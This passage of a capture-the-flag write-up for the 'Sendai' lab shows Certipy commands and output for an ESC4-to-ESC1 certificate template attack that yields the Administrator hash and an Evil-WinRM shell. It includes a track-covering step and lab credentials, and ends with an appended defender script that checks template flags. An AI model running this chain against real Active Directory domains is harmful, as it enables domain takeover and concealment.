[*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*] flags: 66104
[*] pKIDefaultKeySpec: 2
[*] pKIKeyUsage: b'\x86\x00'
[*] pKIMaxIssuingDepth: -1
[*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*] pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*] msPKI-Enrollment-Flag: 0
[*] msPKI-Private-Key-Flag: 16
[*] msPKI-Certificate-Name-Flag: 1
[*] msPKI-Minimal-Key-Size: 2048
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'SendaiComputer'? (y/N): y
[*] Successfully updated 'SendaiComputer'

Verifying Template Modification#

After the modification, I confirmed that the certificate template now met the ESC1 conditions (Enrollee Supplies Subject enabled, with a Client Authentication EKU):

Terminal window
└─$ certipy-ad find -u "clifford.davey" -p "RFmoB2WplgE_3p" -dc-ip 10.129.140.152 -dc-host dc.sendai.vl -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sendai-DC-CA
DNS Name : dc.sendai.vl
Certificate Subject : CN=sendai-DC-CA, DC=sendai, DC=vl
Certificate Serial Number : 326E51327366FC954831ECD5C04423BE
Certificate Validity Start : 2023-07-11 09:19:29+00:00
Certificate Validity End : 2123-07-11 09:29:29+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SENDAI.VL\Administrators
Access Rights
ManageCa : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
ManageCertificates : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
Enroll : SENDAI.VL\Authenticated Users
Certificate Templates
0
Template Name : SendaiComputer
Display Name : SendaiComputer
Certificate Authorities : sendai-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-07-11T12:46:12+00:00
Template Last Modified : 2025-09-17T21:51:59+00:00
Permissions
Object Control Permissions
Owner : SENDAI.VL\Administrator
Full Control Principals : SENDAI.VL\Authenticated Users
Write Owner Principals : SENDAI.VL\Authenticated Users
Write Dacl Principals : SENDAI.VL\Authenticated Users
[+] User Enrollable Principals : SENDAI.VL\Authenticated Users
[+] User ACL Principals : SENDAI.VL\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC4 : User has dangerous permissions.

The template was now vulnerable to both ESC1 and ESC4, with the critical “Enrollee Supplies Subject” flag set and Authenticated Users granted enrollment rights (and full control) over the template.

Administrator Certificate Request#

With the template in a vulnerable state, I requested a certificate for the Administrator account by specifying both the UPN and SID:

Terminal window
└─$ certipy-ad -debug req -u "clifford.davey@sendai.vl" -p "RFmoB2WplgE_3p" -ca sendai-DC-CA -template SendaiComputer -target dc.sendai.vl -upn "administrator@sendai.vl" -sid "S-1-5-21-3085872742-570972823-736764132-500" -dc-ip 10.129.140.152 -dc-host dc.sendai.vl
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.140.152'
[+] DC IP: '10.129.140.152'
[+] DC Host: 'dc.sendai.vl'
[+] Target IP: None
[+] Remote Name: 'dc.sendai.vl'
[+] Domain: 'SENDAI.VL'
[+] Username: 'CLIFFORD.DAVEY'
[+] Trying to resolve 'dc.sendai.vl' at '10.129.140.152'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.140.152[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.140.152[\pipe\cert]
[*] Request ID is 8
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sendai.vl'
[+] Found SID in SAN URL: 'S-1-5-21-3085872742-570972823-736764132-500'
[+] Found SID in security extension: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Certificate object SID is 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Extracting Administrator Credentials#

Using the issued certificate, I extracted the Administrator’s NTLM hash through PKINIT authentication:

Terminal window
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.140.152
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sendai.vl'
[*] SAN URL SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Security Extension SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Using principal: 'administrator@sendai.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a

Achieving Domain Administrator Access#

With the Administrator’s NTLM hash in hand, I established a privileged session on the domain controller:

Terminal window
└─$ evil-winrm -i sendai.vl -u "administrator" -H cfb106feec8b89a3d98e14dcbe8d087a
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Covering Tracks#

To maintain operational security and avoid detection, I reverted the certificate template to its original configuration using the previously saved settings:

Terminal window
└─$ certipy-ad -debug template -u "clifford.davey@sendai.vl" -p "RFmoB2WplgE_3p" -template SendaiComputer -dc-ip 10.129.140.152 -dc-host dc.sendai.vl -target dc.sendai.vl -write-configuration SendaiComputer.json
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.140.152'
[+] DC IP: '10.129.140.152'
[+] DC Host: 'dc.sendai.vl'
[+] Target IP: '10.129.140.152'
[+] Remote Name: 'dc.sendai.vl'
[+] Domain: 'SENDAI.VL'
[+] Username: 'CLIFFORD.DAVEY'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.140.152:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Saving current configuration to 'SendaiComputer.json'
[+] Attempting to write data to 'SendaiComputer.json'
File 'SendaiComputer.json' already exists. Overwrite? (y/n - saying no will save with a unique filename): n
[+] Using alternative filename: 'SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json'
[+] Data written to 'SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json'
[*] Wrote current configuration for 'SendaiComputer' to 'SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json'
[*] Updating certificate template 'SendaiComputer'
[*] Replacing:
[*] nTSecurityDescriptor: b'\x01\x00\x04\x9ch\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00T\x01\x08\x00\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x00\x02\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x03\x02\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x07\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x00\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\x07\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\xf4\x01\x00\x00\x00\x00$\x00\xff\x01\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+h\x04\x00\x00\x00\x00\x14\x00\x94\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08"\xe4 \xea+\xf4\x01\x00\x00'
[*] flags: 131680
[*] pKIDefaultKeySpec: 1
[*] pKIKeyUsage: b'\xa0\x00'
[*] pKIMaxIssuingDepth: 0
[*] pKICriticalExtensions: ['2.5.29.15']
[*] pKIExpirationPeriod: b'\x00\x00]\xd2,\xf6\x8f\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.1', '1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['1,Microsoft RSA SChannel Cryptographic Provider']
[*] msPKI-Enrollment-Flag: 32
[*] msPKI-Private-Key-Flag: 16842752
[*] msPKI-Certificate-Name-Flag: 134217728
[*] msPKI-Minimal-Key-Size: 4096
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.1', '1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'SendaiComputer'? (y/N): y
[*] Successfully updated 'SendaiComputer'

Verification of Template Restoration#

A final verification confirmed that the certificate template was back in its original configuration, with the ESC1 condition no longer present (the ESC4 permissions issue, which is part of the original configuration, remains):

Terminal window
└─$ certipy-ad find -u "clifford.davey" -p "RFmoB2WplgE_3p" -dc-ip 10.129.140.152 -dc-host dc.sendai.vl -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sendai-DC-CA
DNS Name : dc.sendai.vl
Certificate Subject : CN=sendai-DC-CA, DC=sendai, DC=vl
Certificate Serial Number : 326E51327366FC954831ECD5C04423BE
Certificate Validity Start : 2023-07-11 09:19:29+00:00
Certificate Validity End : 2123-07-11 09:29:29+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SENDAI.VL\Administrators
Access Rights
ManageCa : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
ManageCertificates : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
Enroll : SENDAI.VL\Authenticated Users
Certificate Templates
0
Template Name : SendaiComputer
Display Name : SendaiComputer
Certificate Authorities : sendai-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-11T12:46:12+00:00
Template Last Modified : 2025-09-17T22:42:07+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
Object Control Permissions
Owner : SENDAI.VL\Administrator
Full Control Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Owner Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Dacl Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Property Enroll : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
[+] User Enrollable Principals : SENDAI.VL\ca-operators
SENDAI.VL\Domain Computers
[+] User ACL Principals : SENDAI.VL\ca-operators
[!] Vulnerabilities
ESC4 : User has dangerous permissions.

The template had been restored to its original state, showing only the ESC4 finding (which required CA-OPERATORS group membership to exploit). This completed the attack chain while reducing the forensic footprint of the compromise, although the revert itself bumped the template's Template Last Modified timestamp (2023-07-11 before, 2025-09-17 after) and the certificate issued under Request ID 8 is still recorded by the CA, so an audit of template changes or issued certificates would still surface the activity.
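As an added defender-side example (not from the write-up and not Certipy's own code), the following script decodes the msPKI flag values Certipy printed for SendaiComputer in the hijack and restore runs above, evaluates the ESC1 preconditions for each state, and diffs the states the way a template-change audit would; the attribute values are taken from the page, while the dict layout, function names and the LOW_PRIV set are this example's assumptions.

```python
"""Defender-side check of the SendaiComputer template states shown above (added example).
MS-CRTD flag names; attribute values from the page; layout, names and LOW_PRIV are assumptions."""

# msPKI-Certificate-Name-Flag bits (MS-CRTD 2.26)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_DNS = 0x08000000
# msPKI-Enrollment-Flag bits (MS-CRTD 2.27)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002  # Certipy: "Requires Manager Approval"
CT_FLAG_AUTO_ENROLLMENT = 0x00000020
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_ANY_PURPOSE = "2.5.29.37.0"
# Principals treated as low-privileged for the ESC1 enrollment check (assumption).
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}

# Template states from the page: "[*] Replacing:" lists plus the Enrollment Rights,
# Authorized Signatures Required and Template Last Modified lines of the find runs.
ORIGINAL = {
    "msPKI-Certificate-Name-Flag": 134217728,
    "msPKI-Enrollment-Flag": 32,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],
    "msPKI-Minimal-Key-Size": 4096,
    "enrollment_rights": ["Domain Admins", "Domain Computers", "Enterprise Admins"],
    "last_modified": "2023-07-11T12:46:19+00:00",
}
HIJACKED = {
    "msPKI-Certificate-Name-Flag": 1,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "msPKI-Minimal-Key-Size": 2048,
    "enrollment_rights": ["Authenticated Users"],
    "last_modified": "2025-09-17T21:51:59+00:00",
}
# After the revert every attribute is back, but the modification timestamp is not.
RESTORED = dict(ORIGINAL, last_modified="2025-09-17T22:42:07+00:00")

def name_flags(value):
    """Names of the msPKI-Certificate-Name-Flag bits that are set."""
    names = {CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: "EnrolleeSuppliesSubject",
             CT_FLAG_SUBJECT_ALT_REQUIRE_DNS: "SubjectAltRequireDns"}
    return [n for bit, n in names.items() if value & bit]

def esc1_conditions(t):
    """Each ESC1 precondition as a named boolean, so a report can say which one flipped."""
    eku = set(t["pKIExtendedKeyUsage"])
    return {
        "enrollee_supplies_subject": bool(t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "client_auth_eku": not eku or bool(eku & {OID_CLIENT_AUTH, OID_ANY_PURPOSE}),
        "no_manager_approval": not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS,
        "no_signatures_required": t["msPKI-RA-Signature"] == 0,
        "low_priv_can_enroll": bool(LOW_PRIV & set(t["enrollment_rights"])),
    }

def is_esc1(t):
    return all(esc1_conditions(t).values())

def diff_templates(before, after):
    """Attributes whose value changed, as {attr: (old, new)}; the input for a change alert."""
    return {k: (before[k], after[k]) for k in before if before[k] != after.get(k)}

if __name__ == "__main__":
    print("original ESC1:", is_esc1(ORIGINAL), "| hijacked ESC1:", is_esc1(HIJACKED))
    for k, (old, new) in diff_templates(ORIGINAL, RESTORED).items():
        print(f"revert left a trace: {k}: {old} -> {new}")
```

Running it shows the single flag bit that flips the template from ESC4-only to ESC1, and that the revert restores every attribute while leaving the modification timestamp changed, which is what a scheduled comparison against a known-good template baseline should key on.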

Sendai
https://dahmanisec.me/posts/sendai/
Author
Abderrahim Dahmani
Published at
2025-09-10
License
CC BY-NC-SA 4.0